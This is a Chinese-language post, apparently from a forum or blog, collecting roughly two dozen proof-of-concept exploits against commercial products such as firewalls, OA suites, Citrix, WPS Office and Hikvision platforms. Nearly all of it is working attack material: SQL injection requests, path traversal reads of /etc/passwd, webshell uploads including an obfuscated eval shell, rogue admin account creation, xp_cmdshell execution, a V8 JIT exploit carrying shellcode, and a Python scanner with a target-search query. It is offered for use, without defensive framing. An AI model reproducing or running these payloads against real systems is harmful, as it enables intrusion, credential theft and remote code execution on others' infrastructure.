再补充一波poc,懒得去重了,自行筛选哈
1、网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞
POC
POST /changepass.php?type=2
Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}
old_pass=&password=Test123!@&repassword=Test123!@2、网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞
POST /?g=obj_app_upfile HTTP/1.1
Host: x.x.x.x
Accept: /
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="vulntest.php"
Content-Type: text/plain
<?php php马?>
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
注:马儿路径:attachements/xxx.php3、某达OA sql注入漏洞 CVE-2023-4166
GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 14、某达OA sql注入漏洞 CVE-2023-4165 POC
GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 15、Citrix ADC&Citrix Gateway 远程代码执行漏洞
POST /saml/login HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 3150
Content-Type: application/x-www-form-urlencoded
SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCB4bWxuczpzYW1scD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOnByb3RvY29sIiB4bWxuczpzYW1sPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXNzZXJ0aW9uIiBJRD0icGZ4NDFkOGVmMjItZTYxMi04YzUwLTk5NjAtMWIxNmYxNTc0MWIzIiBWZXJzaW9uPSIyLjAiIFByb3ZpZGVyTmFtZT0iU1AgdGVzdCIgRGVzdGluYXRpb249Imh0dHA6Ly9pZHAuZXhhbXBsZS5jb20vU1NPU2VydmljZS5waHAiIFByb3RvY29sQmluZGluZz0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmJpbmRpbmdzOkhUVFAtUE9TVCIgQXNzZXJ0aW9uQ29uc3VtZXJTZXJ2aWNlVVJMPSJodHRwOi8vc3AuZXhhbXBsZS5jb20vZGVtbzEvaW5kZXgucGhwP2FjcyI+CiAgPHNhbWw6SXNzdWVyPkE8L3NhbWw6SXNzdWVyPgogIDxkczpTaWduYXR1cmUgeG1sbnM6ZHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPgogICAgPGRzOlNpZ25lZEluZm8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpTaWduYXR1cmVNZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjcnNhLXNoYTEiLz4KICAgICAgPGRzOlJlZmVyZW5jZSBVUkk9IiNwZng0MWQ4ZWYyMi1lNjEyLThjNTAtOTk2MC0xYjE2ZjE1NzQxYjMiPgogICAgICAgIDxkczpUcmFuc2Zvcm1zPgogICAgICAgICAgPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnbmF0dXJlIi8+CiAgICAgICAgICA8ZHM6VHJhbnNmb3JtIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgICAgPC9kczpUcmFuc2Zvcm1zPgogICAgICAgIDxkczpEaWdlc3RWYWx1ZT5BPC9kczpEaWdlc3RWYWx1ZT4KICAgICAgPC9kczpSZWZlcmVuY2U+CiAgICA8L2RzOlNpZ25lZEluZm8+CiAgICA8ZHM6U2lnbmF0dXJlVmFsdWU+QTwvZHM6U2lnbmF0dXJlVmFsdWU+CiAgPC9kczpTaWduYXR1cmU+CiAgPHNhbWxwOk5hbWVJRFBvbGljeSBGb3JtYXQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjEuMTpuYW1laWQtZm9ybWF0OmVtYWlsQWRkcmVzcyIgQWxsb3dDcmVhdGU9InRydWUiLz4KICA8c2FtbHA6UmVxdWVzdGVkQXV0aG5Db250ZXh0IENvbXBhcmlzb249ImV4YWN0Ij4KICAgIDxzYW1sOkF1dGhuQ29udGV4dENsYXNzUmVmPnVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphYzpjbGFzc2VzOlBhc3N3b3JkUHJvdGVjdGVkVHJhbnNwb3J0PC9zYW1sOkF1dGhuQ29udGV4dENsYXNzUmVmPgogIDwvc2FtbHA6UmVxdWVzdGVkQXV0aG5Db250ZXh0Pgo8L3NhbWxwOkF1dGhuUmVxdWVzdD4=
查看系统版本6、某联达oa sql注入漏洞 POC
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --7、某服 sxf-报表系统 版本有限制
POST /rep/login HTTP/1.1
Host: URL
Cookie:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0
Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2
Accept-Encoding: gzip deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailers
Connection: close
Content-Type:application/x-www-form-urlencoded
Content-Length: 126 clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq8、某盟sas安全审计系统任意文件读取漏洞POC
/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd9、某凌OA前台代码执行
POC
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: www.ynjd.cn:801
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: /
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///etc/passwd"}}10、金山WPS RCE
wps影响范围为:WPS Office 2023 个人版 < 11.1.0.15120
WPS Office 2019 企业版 < 11.8.2.12085
POC
在1.html当前路径下启动http server并监听80端口,修改hosts文件(测试写死的)
127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn
漏洞触发需让域名规则满足clientweb.docer.wps.cn.{xxxxx}wps.cn cloudwps.cn和wps.cn没有任何关系
代码块在底下。(需要原pdf加wechat)
<script>
if(typeof alert === "undefined"){
alert = console.log;
}
let f64 = new Float64Array(1);
let u32 = new Uint32Array(f64.buffer);
function d2u(v) {
f64[0] = v;
return u32;
}
function u2d(lo, hi) {
u32[0] = lo;
u32[1] = hi;
return f64[0];
}
function gc(){ // major
for (let i = 0; i < 0x10; i++) {
new Array(0x100000);
}
}
function foo(bug) {
function C(z) {
Error.prepareStackTrace = function(t, B) {
return B[z].getThis();
};
let p = Error().stack;
Error.prepareStackTrace = null;
return p;
}
function J() {}
var optim = false;
var opt = new Function(
'a', 'b', 'c',
'if(typeof a===\'number\'){if(a>2){for(var
i=0;i<100;i++);return;}b.d(a,b,1);return}' +
'g++;'.repeat(70));
var e = null;
J.prototype.d = new Function(
'a', 'b', '"use strict";b.a.call(arguments,b);return arguments[a];');
J.prototype.a = new Function('a', 'a.b(0,a)');
J.prototype.b = new Function(
'a', 'b',
'b.c();if(a){' +
'g++;'.repeat(70) + '}');
J.prototype.c = function() {
if (optim) {
var z = C(3);
var p = C(3);
z[0] = 0;
e = {M: z, C: p};
}
};
var a = new J();
// jit optim
if (bug) {
for (var V = 0; 1E4 > V; V++) {
opt(0 == V % 4 ? 1 : 4, a, 1);
}
}
optim = true;
opt(1, a, 1);
return e;
}
e1 = foo(false);
e2 = foo(true);
delete e2.M[0];
let hole = e2.C[0];
let map = new Map();
map.set('asd', 8);
map.set(hole, 0x8);
map.delete(hole);
map.delete(hole);
map.delete("asd");
map.set(0x20, "aaaa");
let arr3 = new Array(0);
let arr4 = new Array(0);
let arr5 = new Array(1);
let oob_array = [];
oob_array.push(1.1);
map.set("1", -1);
let obj_array = {
m: 1337, target: gc
};
let ab = new ArrayBuffer(1337);
let object_idx = undefined;
let object_idx_flag = undefined;
let max_size = 0x1000;
for (let i = 0; i < max_size; i++) {
if (d2u(oob_array[i])[0] === 0xa72) {
object_idx = i;
object_idx_flag = 1;
break;
}if (d2u(oob_array[i])[1] === 0xa72) {
object_idx = i + 1;
object_idx_flag = 0;
break;
}
}
function addrof(obj_para) {
obj_array.target = obj_para;
let addr = d2u(oob_array[object_idx])[object_idx_flag] - 1;
obj_array.target = gc;
return addr;
}
function fakeobj(addr) {
let r8 = d2u(oob_array[object_idx]);
if (object_idx_flag === 0) {
oob_array[object_idx] = u2d(addr, r8[1]);
}else {
oob_array[object_idx] = u2d(r8[0], addr);
}
return obj_array.target;
}
let bk_idx = undefined;
let bk_idx_flag = undefined;
for (let i = 0; i < max_size; i++) {
if (d2u(oob_array[i])[0] === 1337) {
bk_idx = i;
bk_idx_flag = 1;
break;
}if (d2u(oob_array[i])[1] === 1337) {
bk_idx = i + 1;
bk_idx_flag = 0;
break;
}
}
let dv = new DataView(ab);
function get_32(addr) {
let r8 = d2u(oob_array[bk_idx]);
if (bk_idx_flag === 0) {
oob_array[bk_idx] = u2d(addr, r8[1]);
} else {
oob_array[bk_idx] = u2d(r8[0], addr);
}
let val = dv.getUint32(0, true);
oob_array[bk_idx] = u2d(r8[0], r8[1]);
return val;
}
function set_32(addr, val) {
let r8 = d2u(oob_array[bk_idx]);
if (bk_idx_flag === 0) {
oob_array[bk_idx] = u2d(addr, r8[1]);
} else {
oob_array[bk_idx] = u2d(r8[0], addr);
}
dv.setUint32(0, val, true);
oob_array[bk_idx] = u2d(r8[0], r8[1]);
}
function write8(addr, val) {
let r8 = d2u(oob_array[bk_idx]);
if (bk_idx_flag === 0) {
oob_array[bk_idx] = u2d(addr, r8[1]);
} else {
oob_array[bk_idx] = u2d(r8[0], addr);
}
dv.setUint8(0, val);
}
let fake_length = get_32(addrof(oob_array)+12);
set_32(get_32(addrof(oob_array)+8)+4,fake_length);
let wasm_code = new
Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,
128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,
128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0
,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
let wasm_mod = new WebAssembly.Module(wasm_code);
let wasm_instance = new WebAssembly.Instance(wasm_mod);
let f = wasm_instance.exports.main;
let target_addr = addrof(wasm_instance)+0x40;
let rwx_mem = get_32(target_addr);
//alert("rwx_mem is"+rwx_mem.toString(16));
const shellcode = new Uint8Array([0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,
0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30,0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14,
0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,0xac, 0x3c, 0x61, 0x7c,
0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52,0x57, 0x8b,
0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01,
0xd1,0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49,
0x8b, 0x34, 0x8b,0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7,
0x38, 0xe0, 0x75, 0xf6, 0x03,0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58,
0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b,0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01,
0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24,0x24, 0x5b, 0x5b, 0x61,
0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb,0x8d, 0x5d,
0x6a, 0x01, 0x8d, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x50, 0x68, 0x31, 0x8b,
0x6f,0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd,
0x9d, 0xff, 0xd5,0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
0x47, 0x13, 0x72, 0x6f, 0x6a,0x00, 0x53, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63,
0x00]);
for(let i=0;i<shellcode.length;i++){
write8(rwx_mem+i,shellcode[i]);
}
f();
</script>11、汉得SRM tomcat.jsp 登录绕过漏洞 POC
/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1
注:然后访问后台:/main.screen12、某联达oa 后台文件上传漏洞 POC
POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: 10.10.10.1:8888
X-Requested-With: Ext.basex
Accept: text/html, application/xhtml+xml, image/jxr, /
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Accept: /
Origin: http://10.10.10.1
Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
Cookie:
Connection: close
Content-Length: 421
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
Content-Type: application/text
<%@ Page Language="Jscript" Debug=true%>
<%
var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';
var GFMA=Request.Form("qmq1");
var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
eval(GFMA, ONOQ);
%>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--13、某联达oa sql注入漏洞 POC
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --14、某微E-Office9文件上传漏洞 CVE-2023-2648 POC
POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 192.168.233.10:8082
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt15、某微E-Office9文件上传漏洞 CVE-2023-2523 POC
POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host:192.168.233.10:8082
Cache-Control:max-age=0
Upgrade-Insecure-Requests:1
Origin:null
Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Accept-Encoding:gzip, deflate
Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection:close
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition:form-data; name="upload_quwan"; filename="1.php."
Content-Type:image/jpeg
<?phpphpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt16、某信景云终端安全管理系统 login SQL注入漏洞 POC
POST /api/user/login
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='17、某恒明御运维审计与风险控制系统堡垒机任意用户注册
POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host: xxx
Cookie: LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 1121
<?xml version="1.0"?>
<methodCall>
<methodName>web.user_add</methodName>
<params>
<param>
<value>
<array>
<data>
<value>
<string>admin</string>
</value>
<value>
<string>5</string>
</value>
<value>
<string>XX.XX.XX.XX</string>
</value>
</data>
</array>
</value>
</param>
<param>
<value>
<struct>
<member>
<name>uname</name>
<value>
<string>deptadmin</string>
</value>
</member>
<member>
<name>name</name>
<value>
<string>deptadmin</string>
</value>
</member>
<member>
<name>pwd</name>
<value>
<string>Deptadmin@123</string>
</value>
</member>
<member>
<name>authmode</name>
<value>
<string>1</string>
</value>
</member>
<member>
<name>deptid</name>
<value>
<string></string>
</value>
</member>
<member>
<name>email</name>
<value>
<string></string>
</value>
</member>
<member>
<name>mobile</name>
<value>
<string></string>
</value>
</member>
<member>
<name>comment</name>
<value>
<string></string>
</value>
</member>
<member>
<name>roleid</name>
<value>
<string>101</string>
</value>
</member>
</struct></value>
</param>
</params>
</methodCall>18、HiKVISION 综合安防管理平台 report 任意文件上传漏洞
fofa查询语句
icon_hash=“-808437027” app=“HIKVISION-iSecure-Center”
EXP/POC:payload.py 脚本 走127.0.0.1:8080 代理,方便burpsuit抓包。
#!usr/bin/env python
# - coding:utf-8 *-*
import sys
import requests
import string
import random
import urllib3
urllib3.disable_warnings()
proxies = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080', #127.0.0.1:8080 代理,方便burpsuit抓包
}
def run(arg):
try:
flag=''.join(random.choices(string.ascii_uppercase + string.digits, k = 9))
filename=''.join(random.choices(string.ascii_uppercase + string.digits, k = 10))
vuln_url=arg+"center/api/files;.js"
headers={'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
'Accept': '*/*',
'Content-Type': 'application/x-www-form-urlencoded'}
file = {'file': (f'../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/{filename}.txt', flag, 'application/octet-stream')}
r = requests.post(vuln_url, files=file, timeout=15, verify=False, proxies=proxies)
if r.status_code==200 and "webapps/clusterMgr" in r.text:
payload=f"clusterMgr/{filename}.txt;.js"
url=arg+payload
r2 = requests.get(url, timeout=15, verify=False, proxies=proxies)
if r2.status_code==200 and flag in r2.text:
print('\033[1;31;40m')
print(arg+f":存在海康威视isecure center 综合安防管理平台存在任意文件上传漏洞\nshell地址:{url}")
print('\033[0m')
else:
print(arg+":不存在漏洞")
except:
print(arg+":不存在漏洞")
if name == '__main__':
url=sys.argv[1]
run(url)
burpsuit抓包分析
burpsuit 127.0.0.1:8080抓包,抓取post 包一个,get 请求包一个。 payload:请求数据包
Plaintext
POST /center/api/files;.js HTTP/1.1
Host: x.x.x.x
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 258
Content-Type: multipart/form-data; boundary=e54e7e5834c8c50e92189959fe7227a4
--e54e7e5834c8c50e92189959fe7227a4
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt"
Content-Type: application/octet-stream
9YPQ3I3ZS
--e54e7e5834c8c50e92189959fe7227a4--
payload的返回数据包。
Plaintext
HTTP/1.1 200
Server: openresty/1.13.6.2
Date: Fri, 14 Jul 2023 04:35:23 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 335
Connection: close
Set-Cookie: JSESSIONID=0A235873FB1C02C345345C0D36A4C709; Path=/center; HttpOnly
Content-Language: en_US
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Content-Disposition: inline;filename=f.txt
{"code":"0","data":{"filename":"../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/
访问漏洞链接:https://x.x.x.x/clusterMgr/2BT5AV96QW.txt;.js ,查看是否上传成功。
因为Hikvision平台使用的中间件为tomcat,修改报文和文件名,所以实现上传哥斯拉生成jsp。 宿主服务器windows和linux都可使用。windows 拿到的账户是system账户,linux为root。 Hikvison账户管理密码的后渗透操作:海康威视综合安防后渗透利用技巧
POC2
Plaintext
POST /center/api/files;.html HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip
<%jsp的马%>
------WebKitFormBoundary9PggsiM755PLa54a--
report 任意文件上传漏洞
Plaintext
POST /svm/api/external/report HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip
<%jsp的马%>
------WebKitFormBoundary9PggsiM755PLa54a--
马儿路径:/portal/ui/login/..;/..;/new.jsp19、HiKVISION 综合安防管理平台 files 任意文件上传漏洞
POST /center/api/files;.html HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip
<%jsp的马%>
------WebKitFormBoundary9PggsiM755PLa54a--20、Exchange Server远程代码执行漏洞(CVE-2023-38182)
待补充poc exp
描述和影响范围
Exchange Server 2019 Cumulative Update 13
Exchange Server 2019 Cumulative Update 12
Exchange Server 2019 Cumulative Update 11
Exchange Server 2016 Cumulative Update 23
需要有普通用户权限
21、Coremail远程代码执行漏洞(官方已辟谣)
22、某微 E-Cology 某版本 SQL注入漏洞
POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 189
Content-Type: text/plain
Accept-Encoding: gzip
callCount=1
page=
httpSessionId=
scriptSessionId=
c0-scriptName=DocDwrUtil
c0-methodName=ifNewsCheckOutByCurrentUser
c0-id=0
c0-param0=string:1 AND 1=1
c0-param1=string:1
batchId=023、某和OA C6-GetSqlData.aspx SQL注入漏洞 POC
POST /C6/Control/GetSqlData.aspx/.ashx
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 189
Content-Type: text/plain
Accept-Encoding: gzip
exec master..xp_cmdshell 'ipconfig'24、大华智慧园区综合管理平台 searchJson SQL注入漏洞
